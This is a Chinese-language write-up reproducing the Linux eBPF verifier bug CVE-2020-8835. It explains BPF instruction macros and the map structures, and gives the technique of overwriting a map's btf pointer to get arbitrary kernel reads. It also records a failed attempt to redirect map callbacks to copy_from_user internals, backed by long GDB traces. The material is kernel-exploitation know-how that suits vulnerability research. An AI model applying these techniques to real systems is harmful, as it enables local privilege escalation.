0%

cve-2020-8835分析

0x00 前言

这个cve复现了好久,主要是一直准备面试来着,不能全心全意的复现,主要是第一个poc还写错了。。。。浪费了许多时间

0x01 BPF模块

简单来说,bpf(Berkeley Packet Filter)模块用于包过滤,用户态可以通过bpf syscall(内核编译选项默认关闭,需要自己开启)向内核注入代码,当然,经过严格的check,内核在通过llvm或者Clang的编译器将c提交伪代码,编译为BPF目标程序,用户态提交代码之后,内核不会立即执行,内核会先模拟执行,以下为参考资料

0x02 bpf使用

参考:

其实和x86汇编没啥区别,主要是对map操作的时候,需要注意一下几点

  • r1-r5为参数
  • r0为返回值
  • 返回值在结束的时候必须清0
  • r2为参数的时候必须指向stack
  • r0返回的一个指针并不是map[0]的值

示例操作

1
2
3
4
5
6
7
8
9
10
      BPF_ALU64_IMM(BPF_MOV,BPF_REG_6,0),
BPF_STX_MEM(BPF_DW,BPF_REG_10,BPF_REG_6,-8),
BPF_MOV64_REG(BPF_REG_2,BPF_REG_10),
BPF_ADD64_IMM(BPF_REG_2,-8),
BPF_LD_MAP_FD(BPF_REG_1,cmd_fd),
BPF_MAP_LOOKUP(),
BPF_JMP_IMM(BPF_JNE,BPF_REG_0,0,1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0),
BPF_ALU64_IMM(BPF_MOV,BPF_REG_0,0)

r0是一个指向map[0]的指针(并不一定是0.。。。),那么,你call完之后map肯定不是0,所以,你可以用JNE判断一下,是否成功

现在着重说两条指令:

  • BPF_LDX_MEM

BPF_LDX_MEM 其实就是一个取内存的操作,参考定义

1
2
3
4
5
6
7
8
9
/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

这个操作主要用于从map中读出到寄存器

  • BPF_STX_MEM
1
2
3
4
5
6
7
8
9
/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

这个操作主要用于把寄存器的值存到map里,也可以把寄存器的值存到stack里面,那么问题来了,那要update_element 这个回调函数有啥用。。。。(ops一般都是这个map类型的独有操作。。。。所以,还是用)

  • BPF_LD_IMM64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#define BPF_LD_IMM64(DST, IMM)					\
BPF_LD_IMM64_RAW(DST, 0, IMM)
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })

这个宏用来将64位立即数一次性的MOV进64位的寄存器

0x03 漏洞分析

主要是在模拟执行的时候,范围判断错误导致任意读写,分析参考

0x04 从越界读写到任意读写

这个地方ZDI已经给出了方法

0x00 任意地址读

在操作arrary map的时候,主要的结构体为

1
2
3
4
5
6
7
8
9
10
11
struct bpf_array {
struct bpf_map map;
u32 elem_size;
u32 index_mask;
struct bpf_array_aux *aux;
union {
char value[0] __aligned(8);
void *ptrs[0] __aligned(8);
void __percpu *pptrs[0] __aligned(8);
};
};

里面map结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
struct bpf_map {
/* The first two cachelines with read-mostly members of which some
* are also accessed in fast-path (e.g. ops, max_entries).
*/
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
struct bpf_map_memory memory;
char name[BPF_OBJ_NAME_LEN];
u32 btf_vmlinux_value_type_id;
bool unpriv_array;
bool frozen; /* write-once; write-protected by freeze_mutex */
/* 22 bytes hole */

/* The 3rd and 4th cacheline with misc members to avoid false sharing
* particularly with refcounting.
*/
atomic64_t refcnt ____cacheline_aligned;
atomic64_t usercnt;
struct work_struct work;
struct mutex freeze_mutex;
u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */
};

里面有个btf结构体在bpf_map_get_info_by_fd函数(bpf syscall 的BPF_OBJ_GET_INFO_BY_FD会call这个函数)中用到,由于你有越界读写自然可以把map结构体的btf结构体改成任意地址,然后就可以任意地址读四个字节

0x01 任意读写的其他(失败)思路

那么问题来了这样做太复杂了,我弄的简单一点通过syscall就能任意地址读写,以下是我的几种(失败)思路

0x00 copy_from_user

我想到copy_from_user和copy_to_user如果可以把他的ops一些回调函数改成copy_from_user和copy_to_user的话,,那不就是任意地址读写了吗,然后发现第一个参数必须得是map。。。。要不然check不过。。。。

0x00 理想分析

一开始没有考虑参数的问题,所以就详细分析了一下copy_from_user,以下是我对copy_from_user 的分析,首先看copy_from_user的源码

1
2
3
4
5
6
7
static __always_inline unsigned long __must_check
copy_from_user(void *to, const void __user *from, unsigned long n)
{
if (likely(check_copy_size(to, n, false)))
n = _copy_from_user(to, from, n);
return n;
}

从利用的角度来讲,这个check_copy_size能绕过则过(意思是能调用_copy_from_user函数就不调用copy_from_user函数),我们可以看到实质做copy的操作是_copy_from_user函数,我们跟进这个函数,

1
2
3
4
5
6
7
8
9
10
11
12
13
static inline __must_check unsigned long
_copy_from_user(void *to, const void __user *from, unsigned long n)
{
unsigned long res = n;
might_fault();
if (likely(access_ok(from, n))) {
kasan_check_write(to, n);
res = raw_copy_from_user(to, from, n);
}
if (unlikely(res))
memset(to + (n - res), 0, res);
return res;
}

看到还是一些check所以,真正做执行的是raw_copy_from_user()函数,所以,再看raw_copy_from_user()函数,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static inline __must_check unsigned long
raw_copy_from_user(void *to, const void __user * from, unsigned long n)
{
if (__builtin_constant_p(n)) {
switch(n) {
case 1:
*(u8 *)to = *(u8 __force *)from;
return 0;
case 2:
*(u16 *)to = *(u16 __force *)from;
return 0;
case 4:
*(u32 *)to = *(u32 __force *)from;
return 0;
#ifdef CONFIG_64BIT
case 8:
*(u64 *)to = *(u64 __force *)from;
return 0;
#endif
}
}

memcpy(to, (const void __force *)from, n);
return 0;
}

看到这个函数,我们看到这个是真正做操作的地方,而且没有任何check,这正是我们要找的函数,然而,你如果找这个函数的地址的话,无论从system.ma还是从vmlinux里面里边,你都找不到这个函数,只能找到_copy_from_user函数,因为我的vmlinux太大了,所以,我只能从gdb看汇编代码,虽然,可以用

1
disassemble /m

去看汇编和源码的对应关系,但是一般不太准,所以,还得看汇编,如果你看汇编的话,你会看到他call了一个copy_user_generic_unrolled函数,所以,我们看一下copy_user_generic_unrolled的汇编代码,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
0xffffffff83ab1fc0 <+0>:     nop
0xffffffff83ab1fc1 <+1>: nop
0xffffffff83ab1fc2 <+2>: nop
0xffffffff83ab1fc3 <+3>: cmp edx,0x8
0xffffffff83ab1fc6 <+6>: jb 0xffffffff83ab2058 <copy_user_generic_unrolled+152>
0xffffffff83ab1fcc <+12>: mov ecx,edi
0xffffffff83ab1fce <+14>: and ecx,0x7
0xffffffff83ab1fd1 <+17>: je 0xffffffff83ab1fe8 <copy_user_generic_unrolled+40>
0xffffffff83ab1fd3 <+19>: sub ecx,0x8
0xffffffff83ab1fd6 <+22>: neg ecx
0xffffffff83ab1fd8 <+24>: sub edx,ecx
0xffffffff83ab1fda <+26>: mov al,BYTE PTR [rsi]
0xffffffff83ab1fdc <+28>: mov BYTE PTR [rdi],al
0xffffffff83ab1fde <+30>: inc rsi
0xffffffff83ab1fe1 <+33>: inc rdi
0xffffffff83ab1fe4 <+36>: dec ecx
0xffffffff83ab1fe6 <+38>: jne 0xffffffff83ab1fda <copy_user_generic_unrolled+26>
0xffffffff83ab1fe8 <+40>: mov ecx,edx
0xffffffff83ab1fea <+42>: and edx,0x3f
0xffffffff83ab1fed <+45>: shr ecx,0x6
0xffffffff83ab1ff0 <+48>: je 0xffffffff83ab203c <copy_user_generic_unrolled+124>
0xffffffff83ab1ff2 <+50>: mov r8,QWORD PTR [rsi]
0xffffffff83ab1ff5 <+53>: mov r9,QWORD PTR [rsi+0x8]
0xffffffff83ab1ff9 <+57>: mov r10,QWORD PTR [rsi+0x10]
0xffffffff83ab1ffd <+61>: mov r11,QWORD PTR [rsi+0x18]
0xffffffff83ab2001 <+65>: mov QWORD PTR [rdi],r8
0xffffffff83ab2004 <+68>: mov QWORD PTR [rdi+0x8],r9
0xffffffff83ab2008 <+72>: mov QWORD PTR [rdi+0x10],r10
0xffffffff83ab200c <+76>: mov QWORD PTR [rdi+0x18],r11
0xffffffff83ab2010 <+80>: mov r8,QWORD PTR [rsi+0x20]
0xffffffff83ab2014 <+84>: mov r9,QWORD PTR [rsi+0x28]
0xffffffff83ab2018 <+88>: mov r10,QWORD PTR [rsi+0x30]
0xffffffff83ab201c <+92>: mov r11,QWORD PTR [rsi+0x38]
0xffffffff83ab2020 <+96>: mov QWORD PTR [rdi+0x20],r8
0xffffffff83ab2024 <+100>: mov QWORD PTR [rdi+0x28],r9
0xffffffff83ab2028 <+104>: mov QWORD PTR [rdi+0x30],r10
0xffffffff83ab202c <+108>: mov QWORD PTR [rdi+0x38],r11
0xffffffff83ab2030 <+112>: lea rsi,[rsi+0x40]
0xffffffff83ab2034 <+116>: lea rdi,[rdi+0x40]
0xffffffff83ab2038 <+120>: dec ecx
0xffffffff83ab203a <+122>: jne 0xffffffff83ab1ff2 <copy_user_generic_unrolled+50>
0xffffffff83ab203c <+124>: mov ecx,edx
0xffffffff83ab203e <+126>: and edx,0x7
0xffffffff83ab2041 <+129>: shr ecx,0x3
0xffffffff83ab2044 <+132>: je 0xffffffff83ab2058 <copy_user_generic_unrolled+152>
0xffffffff83ab2046 <+134>: mov r8,QWORD PTR [rsi]
0xffffffff83ab2049 <+137>: mov QWORD PTR [rdi],r8
0xffffffff83ab204c <+140>: lea rsi,[rsi+0x8]
0xffffffff83ab2050 <+144>: lea rdi,[rdi+0x8]
0xffffffff83ab2054 <+148>: dec ecx
0xffffffff83ab2056 <+150>: jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <+152>: and edx,edx
0xffffffff83ab205a <+154>: je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
0xffffffff83ab205c <+156>: mov ecx,edx
0xffffffff83ab205e <+158>: mov al,BYTE PTR [rsi]
0xffffffff83ab2060 <+160>: mov BYTE PTR [rdi],al
0xffffffff83ab2062 <+162>: inc rsi
0xffffffff83ab2065 <+165>: inc rdi
0xffffffff83ab2068 <+168>: dec ecx
0xffffffff83ab206a <+170>: jne 0xffffffff83ab205e <copy_user_generic_unrolled+158>
0xffffffff83ab206c <+172>: xor eax,eax
0xffffffff83ab206e <+174>: nop
0xffffffff83ab206f <+175>: nop
0xffffffff83ab2070 <+176>: nop
0xffffffff83ab2071 <+177>: ret

看一下汇编和raw_copy_from_user函数的源码,感觉很对应,应该就是这个函数,所以,我们只要把某一个ops的指针改成这个函数就可以了,前提,条件是你能控制前三个参数的值。。。。

0x01 遇到的问题

不知道你发现了没有,这个操作没有关smap的操作,然后,我动态调试的时候,我发现一个问题,即使开了smap,copy_from_user没关smap就能访问用户态内存,懵了,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
 Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rdi : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$rip : 0xffffffff83ab2046 → 0x8d4807894c068b4c → 0x8d4807894c068b4c
$r8 : 0x0000000000000001 → 0x0000000000000001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab203e <copy_user_generic_unrolled+126> and edx, 0x7
0xffffffff83ab2041 <copy_user_generic_unrolled+129> shr ecx, 0x3
0xffffffff83ab2044 <copy_user_generic_unrolled+132> je 0xffffffff83ab2058 <copy_user_generic_unrolled+152>
→ 0xffffffff83ab2046 <copy_user_generic_unrolled+134> mov r8, QWORD PTR [rsi]
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+90 ────
85 .L_copy_short_string:
86 movl %edx,%ecx
87 andl $7,%edx
88 shrl $3,%ecx
89 jz 20f
→ 90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2046 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2046 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe0, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ si
91 19: movq %r8,(%rdi)
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rdi : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$rip : 0xffffffff83ab2049 → 0x4808768d4807894c → 0x4808768d4807894c
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab203d <copy_user_generic_unrolled+125> rol DWORD PTR [rbx-0x163ef81e], 1
0xffffffff83ab2043 <copy_user_generic_unrolled+131> add esi, DWORD PTR [rdx+rdx*1+0x4c]
0xffffffff83ab2047 <copy_user_generic_unrolled+135> mov eax, DWORD PTR [rsi]
→ 0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+91 ────
86 movl %edx,%ecx
87 andl $7,%edx
88 shrl $3,%ecx
89 jz 20f
90 18: movq (%rsi),%r8
→ 91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2049 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2049 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe0, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤
92 leaq 8(%rsi),%rsi
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rdi : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rip : 0xffffffff83ab204c → 0x087f8d4808768d48 → 0x087f8d4808768d48
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab2042 <copy_user_generic_unrolled+130> jmp 0xffffffffcfbd944a
0xffffffff83ab2047 <copy_user_generic_unrolled+135> mov eax, DWORD PTR [rsi]
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
→ 0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
